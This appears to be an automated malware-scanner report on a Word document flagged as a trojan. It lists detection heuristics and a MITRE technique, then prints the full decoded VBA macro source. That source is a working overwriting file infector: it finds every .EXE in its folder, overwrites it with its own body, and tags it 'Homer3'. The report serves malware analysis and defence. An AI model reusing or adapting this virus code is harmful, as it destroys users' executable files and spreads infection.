MALICIOUS
Risk Score: 80
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a Microsoft Word document containing VBA macros. The macro code attempts to write a second-stage executable to disk and displays a fake critical information message to the user. The specific string 'Homer3' is appended to the file, likely as a marker or part of the payload.
Heuristics 2
- ClamAV: Doc.Trojan.Green-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Green-2
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1651 bytes |

SHA-256: ccce358919e7f55a9d3a5428f4221e34ba235f596a3da506274408f0dc875a7f
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Modul1" Option Explicit Dim erej() As Byte Dim zrtva As String Const velicina As Integer = 24576 Dim inf_znak As String Dim homer As String Private Sub Form_Load(): On Error Resume Next: GoTo a a: Dim Free: GoTo b b: Free = FreeFile: GoTo c c: Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free: GoTo d d: ReDim erej(velicina): GoTo e e: Get #1, 1, erej: GoTo f f: Close #Free: GoTo g h: While zrtva <> "": GoTo k g: zrtva = Dir(App.Path & "\" & "*.EXE"): GoTo h k: Open App.Path & "\" & zrtva For Binary Access Read As #Free: GoTo l l: homer = Strings.Space(LOF(Free)): GoTo o o: Get #1, 1, homer: GoTo p p: Close #Free: GoTo u u: inf_znak = Mid(homer, Len(homer)): GoTo z z: If Strings.LCase(inf_znak) <> "Homer3" Then: GoTo t t: Open App.Path & "\" & zrtva For Binary Access Write As #Free: GoTo r r: Put #1, , erej: GoTo w w: Put #1, , velicina: GoTo q q: Put #1, LOF(Free) + 6, "Homer3": GoTo s s: Close #Free: GoTo v v: zrtva = Dir(): GoTo n n: Wend If Day(Now()) = 7 Then MsgBox "Ja sam Homer Veliki-Qurac!", vbCritical, "| Critical Information |" If Month(Now()) = 7 Then MsgBox "Damn! AVP sux!", vbExclamation, "AVP = 0" 'HLLO.Homer_Tha_Pile 3 by e[ax] 'Greetz to all ppl on #virus 'Pozdravljam cijeli BiHNet.ORG '"My Dream Is My Reality" End If: End If End Sub |